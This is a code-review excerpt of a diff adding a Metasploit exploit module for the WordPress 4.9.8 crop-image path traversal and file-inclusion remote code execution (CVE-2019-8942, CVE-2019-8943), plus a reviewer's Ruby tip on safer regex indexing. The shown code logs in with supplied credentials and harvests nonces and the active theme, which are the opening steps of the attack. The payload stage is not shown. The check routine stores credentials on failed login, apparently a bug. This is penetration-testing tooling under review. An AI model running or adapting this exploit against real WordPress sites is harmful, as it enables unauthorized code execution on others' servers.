modules/exploits/unix/webapp/wp_crop_rce.rb

```diff
@@ -0,0 +1,403 @@
+    info,
+    'Name'            => 'WordPress Crop-image Shell Upload',
+    'Description'     => %q{
+        This module exploit a path traversal and a local file inclusion
+        vulnerability on WordPress versions 4.9.8 and less.
+        The crop-image function allow an user, with at least author privileges,
+        to resize an image an perform a path traversal by changing the _wp_attached_file
+        reference during the upload. The second part of the exploit will include
+        this image in the current theme by changing the _wp_page_template attribute
+        when creating a post.
+    },
+    'License'         => MSF_LICENSE,
+    'Author'          =>
+    [
+      'RIPSTECH Technology', # Discovery
+      'Wilfried Becard'    # Metasploit module
+    ],
+  'References'      =>
+    [
+      [ 'CVE', '2019-8942' ],
+      [ 'CVE', '2019-8943' ],
+      [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
+    ],
+    'DisclosureDate'  => 'Feb 19 2019',
+    'Platform'        => 'php',
+    'Arch'            => ARCH_PHP,
+    'Targets'         => [['WordPress', {}]],
+    'DefaultTarget'   => 0
+  ))
+
+  register_options(
+    [
+    OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+    OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+    ])
+  end
+
+  def check
+  cookie = wordpress_login(username, password)
+  if cookie.nil?
+    store_valid_credential(user: username, private: password, proof: cookie)
+    return CheckCode::Safe
+  end
+
+  CheckCode::Appears
+  end
+
+  def username
+  datastore['USERNAME']
+  end
+
+  def password
+  datastore['PASSWORD']
+  end
+
+  def get_wpnonce(cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie' => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      res.get_hidden_inputs.first["_wpnonce"]
+    end
+  end
+
+  def get_current_theme
+    uri = normalize_uri(datastore['TARGETURI'])
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      res.body.scan(/\/wp-content\/themes\/(\w+)\//)[0][0]
+    end
+  end
+
+  def get_ajaxnonce(cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+      'action' => 'query-attachments',
+      'post_id' => '0',
+      'query[item]' => '43',
+      'query[orderby]' => 'date',
+      'query[order]' => 'DESC',
+      'query[posts_per_page]' => '40',
+      'query[paged]' => '1'
+          }
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      res.body.scan(/"edit":"(\w+)"/)[0][0]
```

Comment:
You probably want to use `.flatten.first` here (and other areas where you use `[0][0]`).

```
irb(main):001:0> asdf = 'asdf123zxcv'
=> "asdf123zxcv"
irb(main):002:0> asdf.scan(/.*(123).*/)[0][0]
=> "123"
irb(main):003:0> asdf.scan(/.*(123).*/).flatten.first
=> "123"
irb(main):004:0> asdf.scan(/.*(456).*/)[0][0]
Traceback (most recent call last):
        2: from /usr/bin/irb:11:in `<main>'
        1: from (irb):4
NoMethodError (undefined method `[]' for nil:NilClass)
irb(main):005:0> asdf.scan(/.*(456).*/).flatten.first
=> nil
irb(main):006:0> 
```